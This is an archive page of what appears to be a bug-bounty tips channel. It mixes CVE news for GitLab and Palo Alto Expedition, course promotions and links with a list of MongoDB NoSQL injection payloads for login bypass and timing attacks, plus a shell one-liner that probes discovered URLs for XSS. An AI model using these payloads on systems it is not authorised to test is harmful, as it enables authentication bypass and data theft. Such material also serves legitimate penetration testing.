Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

5 805 subscribers
Posts archive

The Art Of Hacking With Session Hijacking Posted by @TheGodEye

XSS from javascript hidden params
assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"

exploit + lab setup for CVE-2024-45519 🔥 Github #Cve #Exploit 💎

Nmap Commands Cheat Sheet 🧿 🔖#infosec #cybersecurity #hacking #pentesting #security

JWT Token Pentesting.pdf (1.42 KB)

💉Bug Bounty Tools & Techniques 🪱Exploit Vulnerabilities 😇Web Application Security 👻Pentesting Insights 👣Exclusive Bug Bounty Courses 🔴 https://t.me/+VtRjobkjTjw4OGVk

#promo

Bug Bounty Course If you are interested in bug bounty and penetration testing have a look at our channel. Link : click here

🚨 No Sql Injection - Mongo DB Payloads 🚨 true, $where: '1 == 1' , $where: '1 == 1' $where: '1 == 1' ', $where: '1 == 1 1, $where: '1 == 1' { $ne: 1 } ', $or: [ {}, { 'a':'a ' } ], $comment:'successful MongoDB injection' db.injection.insert({success:1}); db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 || 1==1 || 1==1// || 1==1%00 }, { password : /.*/ } ' && this.password.match(/.*/)//+%00 ' && this.passwordzz.match(/.*/)//+%00 '%20%26%26%20this.password.match(/.*/)//+%00 '%20%26%26%20this.passwordzz.match(/.*/)//+%00 {$gt: ''} [$ne]=1 ';sleep(5000); ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); {"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$ne": "foo"}, "password": {"$ne": "bar"}} {"username": {"$gt": undefined}, "password": {"$gt": undefined}} {"username": {"$gt":""}, "password": {"$gt":""}} {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}

🚩 A critical security flaw in #GitLab (CVE-2024-9164) could allow attackers to run CI/CD pipelines on unauthorized branches. Update your instance ASAP to avoid becoming the next victim.

Palo Alto Expedition: Critical Vulnerabilities Exposed
👨‍💻 Researchers at Horizon3.ai 👨‍💻 have discovered critical vulnerabilities in Palo Alto Expedition, a migration tool used to convert configurations from other vendors to Palo Alto Networks systems.
🛡 These vulnerabilities could allow attackers to remotely reset admin credentials, steal sensitive data, and gain unauthorized access to the application.
🔑 Key vulnerabilities include:
➡️ CVE-2024-9463 and CVE-2024-9464: OS command injection
➡️ CVE-2024-9465: SQL injection
➡️ CVE-2024-9466: Cleartext storage of sensitive information
➡️ CVE-2024-9467: Cross-site scripting (XSS)
🔐 If you're using Palo Alto Expedition, it's crucial to patch these vulnerabilities immediately.
Video PoC ➡️ https://youtu.be/AF37ncAq__E?si=D6E2IkTONcAKyGQQ


Deep Fake.pdf (2.27 MB)

Bug Bounty for Beginners 💰 🔖#infosec #cybersecurity #hacking #pentesting #security

CVE-2024-45409 | Ruby-SAML Auth Bypass In GitLab
What You'll Learn 💡
1️⃣ Overview | Description of CVE-2024-45409
2️⃣ Reconnaissance For CVE-2024-45409: Shodan.io, Censys.io, Fofa.info, Hunter.how, ZoomEYE.HK
3️⃣ Exploit ☣️ CVE-2024-45409 | GiveWP WordPress Plugin Exploit
4️⃣ Exploit Installation 📥
5️⃣ Exploit Tool Guide 🧭
6️⃣ Impact 💥
7️⃣ Severity ⚠️
8️⃣ Remediation ♻️
https://yashsec.com/bug-bounty/cve-2024-45409-auth-bypass-in-gitlab/